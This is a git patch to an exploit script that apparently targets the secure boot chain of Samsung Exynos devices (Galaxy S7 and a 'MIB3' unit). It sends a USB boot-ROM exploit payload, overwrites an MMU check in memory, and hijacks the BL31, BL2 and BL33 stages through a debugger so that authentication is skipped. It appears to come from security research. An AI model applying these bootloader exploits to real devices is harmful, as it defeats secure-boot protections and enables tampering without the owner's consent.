From ef4b266b62e6663dbd341b107e7c1b4598e17af2 Mon Sep 17 00:00:00 2001 From: Jonathan Herrewijnen Date: Tue, 12 Nov 2024 20:58:34 +0100 Subject: [PATCH] boots mib3 after BL33. keeps debugger? --- source/exploit/.vscode/launch.json | 4 +- source/exploit/exploit.py | 61 ++++++++++++++++++++---------- 2 files changed, 43 insertions(+), 22 deletions(-) diff --git a/source/exploit/.vscode/launch.json b/source/exploit/.vscode/launch.json index b640638..1498c6d 100644 --- a/source/exploit/.vscode/launch.json +++ b/source/exploit/.vscode/launch.json @@ -28,7 +28,7 @@ "program": "exploit.py", "console": "integratedTerminal", "justMyCode": false, - "args": ["--unsecure-boot"] + "args": ["--unsecure-boot", "--MIB3"] }, { "name": "Run debugger boot", @@ -37,7 +37,7 @@ "program": "exploit.py", "console": "integratedTerminal", "justMyCode": false, - "args": ["--debugger-boot", "--MIB3"], + "args": ["--debugger-boot", "--MIB3"], //, "--MIB3" }, { "name": "Debug current file", diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py index d17c72b..21bf36e 100644 --- a/source/exploit/exploit.py +++ b/source/exploit/exploit.py @@ -161,28 +161,40 @@ class ExynosDevice(): ''' Do a normal boot process, with or without exploit. ''' + bl1 = open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read() + bl31 = open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read() + bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read() + bl33 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read() + if args.MIB3: + bl1 = open("../mib3/boot_partitions/fwbl1_a.bin", "rb").read() + bl31 = open("../mib3/boot_partitions/el3_mon_a.bin", "rb").read() + bl2 = open("../mib3/boot_partitions/bl2_a.bin", "rb").read() + bl33 = open("../mib3/boot_partitions/u-boot_a.bin", "rb").read() + off = bl31.find(b'Built') + bl31 = bl31[:off] + b'Built' + bl31[off+len(b'Built'):] + if exploit: self.exploit(open("../../dump/exynos-usbdl/payloads/Exynos8890_unsecure_boot_usb.bin", "rb").read()) time.sleep(2) self.connect_device() # self.send_normal_stage("/home/eljakim/Source/Samsung_S7/source/S7/g930f_latest/g930f_sboot.bin.1.bin") - self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read()) + self.send_normal_stage(bl1) # self.send_normal_stage(open("../S7/bl1.bin", "rb").read()) # self.send_normal_stage(open("../../dump/rom.bin.1.bin", "rb").read()) # wait_disconnect() time.sleep(2) self.connect_device() - self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()) + self.send_normal_stage(bl31) # self.send_normal_stage(open("../S7/bl31.bin", "rb").read()) # wait_disconnect() time.sleep(2) self.connect_device() - self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()) + self.send_normal_stage(bl2) # self.send_normal_stage(open("../S7/sboot.bin.3.bin", "rb").read()) # wait_disconnect() time.sleep(2) self.connect_device() - self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()) + self.send_normal_stage(bl33) # self.send_normal_stage(open("../S7/sboot.bin.4.bin", "rb").read()) pass @@ -757,7 +769,7 @@ class ExynosDevice(): MMU_CHECK = 0x0202a314 if not args.MIB3: MMU_CHECK = 0x020244e8 - self.cd.memwrite_region(MMU_CHECK, struct.pack('>I', 0x1f0c00f1)) # Change check to always be false + self.cd.memwrite_region(MMU_CHECK, struct.pack('>I', 0x1f0c00f1)) # Change check to always be false # DWC3 OTG update mode -> Might be useful at some point? # self.cd.memwrite_region(0x02021580, struct.pack('>I', 0x00000000)) @@ -765,8 +777,10 @@ class ExynosDevice(): # Jump into BL31 and execute it BL31_POINTER = 0x02024010 if args.MIB3: - BL31_POINTER = 0x020c0000 - self.cd.restore_stack_and_jump(BL31_POINTER) + BL31_POINTER = 0x0202a010 + self.cd.restore_stack_and_jump(BL31_POINTER) #BL31_RA_PTR + else: + self.cd.restore_stack_and_jump(BL31_POINTER) # Obligatory reconnect and check of debugger time.sleep(2) @@ -793,11 +807,6 @@ class ExynosDevice(): self.cd.restore_stack_and_jump(hijacked_fun) # Jumps to function that waits for next boot stage - # In BL2, find string 'APOLLO' and modify it - if args.MIB3: - off = bl2.find(b'APOLLO') - bl2 = bl2[:off] + b'GUPJE' + bl2[off+6:] - # ==== Stage 4 BL2 ==== self.send_normal_stage(bl2) time.sleep(2) @@ -814,7 +823,7 @@ class ExynosDevice(): print(f'Current EL: {hex(self.cd.arch_dbg.state.CURRENT_EL)}') # Restore bootflow - print(self.cd.arch_dbg.state.print_ctx()) + print(self.cd.arch_dbg.state.print_ctx()) # X29 here determines where the 'authentication' is taking place BL33_ptr = self.cd.arch_dbg.state.X0 BL33_LR = self.cd.arch_dbg.state.LR self.cd.arch_dbg.state.LR = DEBUGGER_ADDR @@ -826,26 +835,38 @@ class ExynosDevice(): self.cd.restore_stack_and_jump(hijacked_fun) time.sleep(1) self.connect_device() + self.send_normal_stage(bl33) # Never return/completes self.connect_device() self.usb_read(0x200) # GiAs + #t_lr = self.cd.arch_dbg.state.LR # print_payload = open("/home/jonathan/projects/samsung_s7/source/screen_print/print.bin", "rb").read() # off = stage4.find(bytes.fromhex("fd 7b bd a9 fd 03 00 91 f3 53 01 a9 d4 08 00 d0 f3 03 01 2a a0 17 00 f9")) # stage4 = stage4[off:] + print_payload + stage4[off+len(print_payload):] + if args.MIB3: + pass # Change bootmode to SDCARD (allow normal booting, if pressing volume up) - self.cd.memwrite_region(0x8f01dbdc, struct.pack('>I', 0x03030035)) - self.cd.memwrite_region(0x8f01dbe0, struct.pack('>I', 0x80f9ff34)) + if not args.MIB3: + self.cd.memwrite_region(0x8f01dbdc, struct.pack('>I', 0x03030035)) + self.cd.memwrite_region(0x8f01dbe0, struct.pack('>I', 0x80f9ff34)) - # Move default values into registers - self.cd.memwrite_region(0x8f021bac, struct.pack('>I', 0x20008052)) - self.cd.memwrite_region(0x8f021bdc, struct.pack('>I', 0x20008052)) - self.cd.memwrite_region(0x8f021bbc, struct.pack('>I', 0x20008052)) + # Move default values into registers + self.cd.memwrite_region(0x8f021bac, struct.pack('>I', 0x20008052)) + self.cd.memwrite_region(0x8f021bdc, struct.pack('>I', 0x20008052)) + self.cd.memwrite_region(0x8f021bbc, struct.pack('>I', 0x20008052)) + + #self.cd.memwrite_region(0xcf08aa4b, b"RRR") # Jump into a different function that continues the boot flow (different than BL33_LR) - self.cd.restore_stack_and_jump(0x02024e5c) + BL33_AUTH = 0x02024e5c + if args.MIB3: + BL33_AUTH = 0x2022ad44 + + self.cd.arch_dbg.state.LR = DEBUGGER_ADDR + self.cd.restore_stack_and_jump(0x202ae18) pass